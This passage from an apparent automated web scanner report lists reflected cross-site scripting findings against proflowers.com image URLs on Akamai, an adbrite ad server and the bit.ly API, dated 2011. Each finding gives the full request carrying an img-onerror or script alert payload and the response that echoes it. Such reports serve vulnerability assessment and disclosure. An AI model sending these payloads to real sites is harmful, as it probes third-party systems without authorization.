GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQdde05<img%20src%3da%20onerror%3dalert(1)>7b7dbc8df13?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:00 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000007H355_69865_W2_SQdde05<img src=a onerror=alert(1)>7b7dbc8df13

5.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b5852<img%20src%3da%20onerror%3dalert(1)>e0c47f2adfe was submitted in the REST URL parameter 9. This input was echoed as b5852<img src=a onerror=alert(1)>e0c47f2adfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQb5852<img%20src%3da%20onerror%3dalert(1)>e0c47f2adfe?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:38 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000008H201_82170_W2_SQb5852<img src=a onerror=alert(1)>e0c47f2adfe

5.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5dc38<img%20src%3da%20onerror%3dalert(1)>73585b63516 was submitted in the REST URL parameter 9. This input was echoed as 5dc38<img src=a onerror=alert(1)>73585b63516 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ5dc38<img%20src%3da%20onerror%3dalert(1)>73585b63516?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:39 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000008H203_82172_W1_SQ5dc38<img src=a onerror=alert(1)>73585b63516

5.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1 [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fd9b1<img%20src%3da%20onerror%3dalert(1)>c9ece6814af was submitted in the REST URL parameter 9. This input was echoed as fd9b1<img src=a onerror=alert(1)>c9ece6814af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1fd9b1<img%20src%3da%20onerror%3dalert(1)>c9ece6814af?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:34 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000010D01X_103184_W1fd9b1<img src=a onerror=alert(1)>c9ece6814af

5.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload bf8d3<img%20src%3da%20onerror%3dalert(1)>4c20501340f was submitted in the REST URL parameter 9. This input was echoed as bf8d3<img src=a onerror=alert(1)>4c20501340f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQbf8d3<img%20src%3da%20onerror%3dalert(1)>4c20501340f?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:34 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000008G370X_85066_W7_SQbf8d3<img src=a onerror=alert(1)>4c20501340f

5.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dc8f1<img%20src%3da%20onerror%3dalert(1)>351d0d588f3 was submitted in the REST URL parameter 9. This input was echoed as dc8f1<img src=a onerror=alert(1)>351d0d588f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQdc8f1<img%20src%3da%20onerror%3dalert(1)>351d0d588f3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:46 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000009A230X_85266_W1_SQdc8f1<img src=a onerror=alert(1)>351d0d588f3

5.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d3241<img%20src%3da%20onerror%3dalert(1)>b814b4c37bb was submitted in the REST URL parameter 9. This input was echoed as d3241<img src=a onerror=alert(1)>b814b4c37bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQd3241<img%20src%3da%20onerror%3dalert(1)>b814b4c37bb?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:04:55 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_000000011F48_0138343_W1_SQd3241<img src=a onerror=alert(1)>b814b4c37bb

5.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6af88<img%20src%3da%20onerror%3dalert(1)>3334b396171 was submitted in the REST URL parameter 9. This input was echoed as 6af88<img src=a onerror=alert(1)>3334b396171 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ6af88<img%20src%3da%20onerror%3dalert(1)>3334b396171?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:35 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ6af88<img src=a onerror=alert(1)>3334b396171

5.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1 [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 908f9<img%20src%3da%20onerror%3dalert(1)>5ff4f03be4a was submitted in the REST URL parameter 9. This input was echoed as 908f9<img src=a onerror=alert(1)>5ff4f03be4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1908f9<img%20src%3da%20onerror%3dalert(1)>5ff4f03be4a?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:57 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000011A98X_114727_W1908f9<img src=a onerror=alert(1)>5ff4f03be4a

5.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5b198<img%20src%3da%20onerror%3dalert(1)>c4c8409ea3e was submitted in the REST URL parameter 9. This input was echoed as 5b198<img src=a onerror=alert(1)>c4c8409ea3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ5b198<img%20src%3da%20onerror%3dalert(1)>c4c8409ea3e?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:27 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ5b198<img src=a onerror=alert(1)>c4c8409ea3e

5.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 231ab<img%20src%3da%20onerror%3dalert(1)>e6d8d6db049 was submitted in the REST URL parameter 9. This input was echoed as 231ab<img src=a onerror=alert(1)>e6d8d6db049 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ231ab<img%20src%3da%20onerror%3dalert(1)>e6d8d6db049?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:04:58 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ231ab<img src=a onerror=alert(1)>e6d8d6db049

5.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e2157<img%20src%3da%20onerror%3dalert(1)>5531a670ae2 was submitted in the REST URL parameter 9. This input was echoed as e2157<img src=a onerror=alert(1)>5531a670ae2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQe2157<img%20src%3da%20onerror%3dalert(1)>5531a670ae2?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:54 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQe2157<img src=a onerror=alert(1)>5531a670ae2

5.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4b059<img%20src%3da%20onerror%3dalert(1)>6709cddd430 was submitted in the REST URL parameter 9. This input was echoed as 4b059<img src=a onerror=alert(1)>6709cddd430 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ4b059<img%20src%3da%20onerror%3dalert(1)>6709cddd430?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:43 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ4b059<img src=a onerror=alert(1)>6709cddd430

5.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 76672<img%20src%3da%20onerror%3dalert(1)>2c03fb67eb4 was submitted in the REST URL parameter 9. This input was echoed as 76672<img src=a onerror=alert(1)>2c03fb67eb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b76672<img%20src%3da%20onerror%3dalert(1)>2c03fb67eb4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:20 GMT
Connection: close

Unable to find /ProvideCommerce/p0084749b76672<img src=a onerror=alert(1)>2c03fb67eb4

5.27. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ebb35<script>alert(1)</script>63fe973072f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/742697ebb35<script>alert(1)</script>63fe973072f?d=2925993182975414771 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb2=EAE; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirOLM3IrzEsr0xMN6sxqjEsyShW0lFKSszLSy3KBKtQqq0FAA%3D%3D"; vsd=0@1@4e60f636@www.garage4hackers.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sun, 04 Sep 2011 00:59:04 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/742697ebb35<script>alert(1)</script>63fe973072f

5.28. http://api.bit.ly/shorten [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bit.ly
Path:	/shorten

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 75787<script>alert(1)</script>6092a370891 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

